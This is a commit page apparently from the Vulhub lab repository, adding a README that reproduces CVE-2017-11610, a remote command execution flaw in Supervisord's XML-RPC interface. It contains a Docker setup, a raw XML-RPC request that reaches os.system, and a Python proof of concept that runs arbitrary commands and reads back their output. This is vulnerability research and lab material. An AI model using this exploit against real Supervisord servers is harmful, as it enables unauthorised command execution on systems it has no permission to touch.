first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
79
supervisor/CVE-2017-11610/README.md
Normal file
79
supervisor/CVE-2017-11610/README.md
Normal file
@@ -0,0 +1,79 @@
|
||||
# Supervisord XML-RPC Remote Command Execution (CVE-2017-11610)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Supervisord is a process control system for Unix-like operating systems.
|
||||
|
||||
In the supervisor version before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3, a remote code execution vulnerability exists in its XML-RPC interface, which allows attackers to execute arbitrary commands through specially crafted XML-RPC requests.
|
||||
|
||||
References:
|
||||
|
||||
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
|
||||
- https://blogs.securiteam.com/index.php/archives/3348
|
||||
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following commands to start Supervisord 3.3.2:
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server starts, you can access the Supervisord interface at `http://your-ip:9001`.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
Send the following request to the XML-RPC interface, and the command will be executed:
|
||||
|
||||
```
|
||||
POST /RPC2 HTTP/1.1
|
||||
Host: localhost
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 213
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<methodCall>
|
||||
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<string>touch /tmp/success</string>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
|
||||
|
||||
|
||||
### POC with Direct Output
|
||||
|
||||
@Ricter proposed an effective approach on Weibo: write the command execution results to a log file, then use Supervisord's built-in readLog method to read the log file and retrieve the results.
|
||||
|
||||
Here's a simple POC [poc.py](poc.py):
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import xmlrpc.client
|
||||
import sys
|
||||
|
||||
|
||||
target = sys.argv[1]
|
||||
command = sys.argv[2]
|
||||
with xmlrpc.client.ServerProxy(target) as proxy:
|
||||
old = getattr(proxy, 'supervisor.readLog')(0,0)
|
||||
|
||||
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
|
||||
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
|
||||
result = getattr(proxy, 'supervisor.readLog')(0,0)
|
||||
|
||||
print(result[len(old):])
|
||||
```
|
||||
|
||||
Execute with Python3 to get the results: `./poc.py "http://your-ip:9001/RPC2" "command"`:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user